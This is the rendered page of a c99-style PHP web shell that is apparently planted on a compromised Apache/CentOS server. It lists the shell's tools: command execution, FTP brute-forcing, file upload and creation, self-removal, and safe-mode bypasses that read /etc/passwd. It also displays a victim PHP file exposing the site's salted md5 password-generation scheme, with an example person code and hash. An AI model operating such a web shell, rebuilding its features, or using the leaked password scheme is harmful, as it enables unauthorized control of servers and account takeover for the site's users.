!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis2222/ums/   drwxr-xr-x
Free 52.61 GB of 127.8 GB (41.16%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     testtest.php (1 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Information:
Path /var/www/html/mis2222/ums/testtest.php
Size 1 KB
MD5 c9e57dad0053f73e50d21725767fedff
Owner/Group apache/apache
Perms-rwxr-xr-x
Create time 20/02/2020 14:54:08
Access time 24/04/2024 14:36:24
MODIFY time 13/06/2011 13:29:20

HEXDUMP PREVIEW
00000000
00000018
00000030
00000048
00000060
00000078
00000090
000000A8
3C 3F 0A 2F 2F 67 65 6E 20 70 61 73 73 77 6F 72 64 20 20 38 20 63 68 61
72 61 63 74 65 72 73 20 20 3A 3A 20 20 73 75 62 73 74 72 28 6D 64 35 28
22 4F 5D 4F 22 2E 24 6F 50 2D 3E 70 65 72 73 6F 6E 43 6F 64 65 2E 22 4F
5B 4F 22 29 2C 20 30 2C 20 38 29 20 20 0A 2F 2F 65 67 2E 09 70 65 72 73
6F 6E 63 6F 64 65 20 3D 20 33 39 33 31 30 31 0A 2F 2F 09 09 6D 64 35 28
22 4F 5D 4F 22 2E 24 6F 50 2D 3E 70 65 72 73 6F 6E 43 6F 64 65 2E 22 4F
5B 4F 22 29 20 3D 20 64 30 30 33 36 66 62 36 31 32 36 64 32 64 64 38 61
34 61 66 39 31 34 35 61 36 61 64 65 34 39 62 0A 2F 2F 69 6E 20 75 6D 73
<? //gen password  8 cha
racters  ::  substr(md5(
"O]O".$oP->personCode."O
[O"), 0, 8)   //eg. pers
oncode = 393101 // md5(
"O]O".$oP->personCode."O
[O") = d0036fb6126d2dd8a
4af9145a6ade49b //in ums

HEXDUMP: [Full] [Preview]
Base64:
[Encode [+chunk [+chunk+quotes [Decode


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0156 ]--